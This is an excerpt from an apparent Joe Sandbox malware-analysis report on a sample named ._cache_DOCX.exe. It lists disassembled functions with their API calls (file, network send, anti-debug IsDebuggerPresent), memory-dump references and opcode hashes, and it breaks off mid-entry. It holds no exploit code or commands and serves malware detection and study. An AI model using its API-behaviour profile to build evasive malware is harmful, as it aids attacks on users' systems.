SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006CE344
_strlen.LIBCMT ref: 006CE34F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID:
API String ID: 2777139624-0
Opcode ID: 364f68af7b4a493b104a01e767c8bd4ce52c51669b3e8befe5b83fe4149671a4
Instruction ID: d657c4414fcd7122104b4f7731d5e6f26b35799611ff6c07501d814287b2b338
Opcode Fuzzy Hash: 364f68af7b4a493b104a01e767c8bd4ce52c51669b3e8befe5b83fe4149671a4
Instruction Fuzzy Hash: 7B11E73120020567DF44BBA8DC86EFF7BBEDF45340B00443EF60ADB192DE65A84687A8

Function 00693682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74D2C8D0.UXTHEME ref: 006936E6

Part of subcall function 006B2025: __lock.LIBCMT ref: 006B202B

Part of subcall function 006932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006932F6
Part of subcall function 006932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0069330B

Part of subcall function 0069374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0069376D
Part of subcall function 0069374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0069377F
Part of subcall function 0069374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_DOCX.exe,00000104,?,00751120,C:\Users\user\Desktop\._cache_DOCX.exe,00751124,?,?), ref: 006937EE
Part of subcall function 0069374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00693860

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00693726

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
String ID:
API String ID: 3809921791-0
Opcode ID: 6942c557f8af39b8decbc5397e39c384a8303575d6eb1830e418e33d0f9dfa8e
Instruction ID: e43df7607b14a1706d80a89d4e96519789abf420d48c5c72dd191dc11de1cd61
Opcode Fuzzy Hash: 6942c557f8af39b8decbc5397e39c384a8303575d6eb1830e418e33d0f9dfa8e
Instruction Fuzzy Hash: E011C3B19043419BC310EF29DC05A4EBBE9FF85711F00891EF448872B1D7B49945CF9A

Function 00694B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00694C2B,?,?,?,?,0069BE63), ref: 00694BB6
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00694C2B,?,?,?,?,0069BE63), ref: 00704972

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fe56f6006268db0e2f209dc3b98f360900b0b65ddb2042f52195d02a56b0b975
Instruction ID: 1a885c62945e398fe94707203d565203946bbde5b522c0f48a61d093d9262836
Opcode Fuzzy Hash: fe56f6006268db0e2f209dc3b98f360900b0b65ddb2042f52195d02a56b0b975
Instruction Fuzzy Hash: F8019670144308BEFB344E18CCCAFA637DDEB15768F108319BAE45A1E0C6B45C468B14

Function 006AF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,006DAEA5,?,?,00000000,00000008), ref: 006AF282
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,006DAEA5,?,?,00000000,00000008), ref: 006AF2A6

Part of subcall function 006AF2D0: _memmove.LIBCMT ref: 006AF307

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: b9249d9ce48492c08d79a62df9d875d0a3e9e41b33c8e1ecb9023ecba1191237
Instruction ID: 112a1557634e52794fa4898ddcc216beff7ba7c129f81553cd6d0b5f5b543515
Opcode Fuzzy Hash: b9249d9ce48492c08d79a62df9d875d0a3e9e41b33c8e1ecb9023ecba1191237
Instruction Fuzzy Hash: C2F04FB6104114BFAB14ABE5DC44DFB7FAEEF8A360700802AFD08CA111DA31DD419BB9

Function 006BF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 006BF7D9
__close_nolock.LIBCMT ref: 006BF7F2

Part of subcall function 006B886A: __getptd_noexit.LIBCMT ref: 006B886A

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: fe3c66a9bf65780f0df9fd6e5560d75fb4f846ec8796c347a97714310a4ac4f9
Instruction ID: 5ea0703321b3bc3bffabcd64df5b74fabba4ac546eedf6229432f34e70058346
Opcode Fuzzy Hash: fe3c66a9bf65780f0df9fd6e5560d75fb4f846ec8796c347a97714310a4ac4f9
Instruction Fuzzy Hash: B811A0F28056108FD7517F649C413D876A66F42331F6542A8E4205B2F3CFB859C1C7A9

Function 006934F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0069352A

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

_wcscat.LIBCMT ref: 007066C0

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 7357a8accbeac8a3de052620ed4c23148bade03c7c19d6501fc40c02908168d0
Instruction ID: fadd0a1cba32fea3619b3de1bfa129c2a0e6973482ef27fd32c172e82570a2fa
Opcode Fuzzy Hash: 7357a8accbeac8a3de052620ed4c23148bade03c7c19d6501fc40c02908168d0
Instruction Fuzzy Hash: 7501497190411CABCF40FBA0D845ADD73FEEF18309F0141A9B916D7590EE708F858BA5

Function 006E9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,?,00000000,00000000), ref: 006E9534
WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 006E9557

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 117cf076d27d9b8f8cbd0282ff241f6ae871dd1b74676697b1e83d42794cbb34
Instruction ID: 93312f3001d589436d4a135125c074b8ef0f2e4c8e908370fd4bb9b96b2d6b54
Opcode Fuzzy Hash: 117cf076d27d9b8f8cbd0282ff241f6ae871dd1b74676697b1e83d42794cbb34
Instruction Fuzzy Hash: 61012C356002009FD750EB29D891B6AB7EAEF99720F11C52EE65A87391CA74EC05CB64

Function 006B4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

__lock_file.LIBCMT ref: 006B42B9

Part of subcall function 006B5A9F: __lock.LIBCMT ref: 006B5AC2

__fclose_nolock.LIBCMT ref: 006B42C4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 39ff95d44d57eb241b88c0bcb9a44b31771268c7b8f53c6242a962cff4c31d3b
Instruction ID: d8944c4e7304aa644afa779bf3e1bbfe0c82ed060621a1d1616a0bee3fd16046
Opcode Fuzzy Hash: 39ff95d44d57eb241b88c0bcb9a44b31771268c7b8f53c6242a962cff4c31d3b
Instruction Fuzzy Hash: A4F0B4F18017149ADB51AB7588027DE67D2AF81334F21820DF825AB2C3CF7C8AC1AB59

Function 006AF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006AF57A

Part of subcall function 0069E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0069E279

Sleep.KERNEL32(00000000), ref: 007075D3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: 857655558bb9dd3073336ae0c35142aa32598f54a02bbb1acb65bc756829b8e6
Instruction ID: f902bf7501bf76847263374df36dfb6b472271b6062a9555bbca2636afde5bc1
Opcode Fuzzy Hash: 857655558bb9dd3073336ae0c35142aa32598f54a02bbb1acb65bc756829b8e6
Instruction Fuzzy Hash: 5DF08C712406189FD364EF79D805B96BBEAEF58320F00442AF819C7691DB70AC00CBE5

Function 006981C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON

Download Yara Rule

APIs

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

__wcsnicmp.LIBCMT ref: 006983C4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __itow__swprintf__wcsnicmp
String ID:
API String ID: 712828618-0
Opcode ID: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
Instruction ID: cdd70a07458d079381bfce8326343942ae19c3e5d92e3dde5a7a85baf9880c72
Opcode Fuzzy Hash: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
Instruction Fuzzy Hash: 32F17B71508302AFCB44EF58C89186EBBEAFF99710F54891DF98587661EB30ED05CB86

Function 006A4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
Instruction ID: 3e326b1094e83ea872b14ee8ee8dd4239c5f8c0e31769f49e602222a014fd506
Opcode Fuzzy Hash: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
Instruction Fuzzy Hash: 3C61C1B0A04206DFCB14EF54C880A7AB7E6FF5A314F10866DE91687681DBB1EC95CF91

Function 006AEF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f86ba4f191acaa9837ac928ddccb5fd66ffdf8094ecca30ebc79b1bec15b93
Instruction ID: 024da6e3770bc1564c617a16a2250224d08d68cc08c8ae6d7075feb5ad269939
Opcode Fuzzy Hash: b9f86ba4f191acaa9837ac928ddccb5fd66ffdf8094ecca30ebc79b1bec15b93
Instruction Fuzzy Hash: F551AE74600104EFCF44EBA8C9A1EAD77EBAF49310B1441ADF9069B792DB35ED01DB54

Function 0069B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0069B7C2

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
Instruction ID: 66a83f78a100c1a44667513bc8eb456f1dc654ec7508c1c492b61a01472c554e
Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
Instruction Fuzzy Hash: 6541D0B9200602CFCB14DF59E590972F7E6FF88360714C66EE99A8BB51D730E852CB14

Function 00694EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00694F8F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1f364471dba8b9d7faf1dbe1c7b3222d7baae503ffad2fe2466a2574c748385b
Instruction ID: 85226c241146036ac96d8dd6652630ce243187577ad752c33878e833058f9c82
Opcode Fuzzy Hash: 1f364471dba8b9d7faf1dbe1c7b3222d7baae503ffad2fe2466a2574c748385b
Instruction Fuzzy Hash: 01315E71A10616AFCF18CF6CC484AADB7BABF88310F148629E81993B50DB74BD51CB90

Function 006AF92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

select.WS2_32 ref: 006AF9DB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 3dd0d24e8744756a4b02b2ded3beb543ea8950e2703c82f6365da09c008dc6de
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: C231B670A00106EBD758EF98D480AAAF7A6FB4A310B2486A5E449CB355D731EDC1CFD1

Function 0070AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0070AA65

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1f2133b9e539c3966e3c7ad574616ff971afdda1bccea09d36a9770ab4b986f3
Instruction ID: 538970872adbb4eb4c8a12ca9ac4e572f7e5dbdac05567aa56c64c211a9647b0
Opcode Fuzzy Hash: 1f2133b9e539c3966e3c7ad574616ff971afdda1bccea09d36a9770ab4b986f3
Instruction Fuzzy Hash: 16414BB4504651DFEB24DF18C444B1ABBE2BF46304F1985ACE9964B362C376EC85CF52

Function 00694D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00694DAD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d7ae02658d8dbf108027b98470f96620d3a87810b954c77f7f60046eab91d2d1
Instruction ID: 6d9a58e394abe20bc0788ad1e0e50ac7031aeb5377b5fe407b660ed4c8ae032b
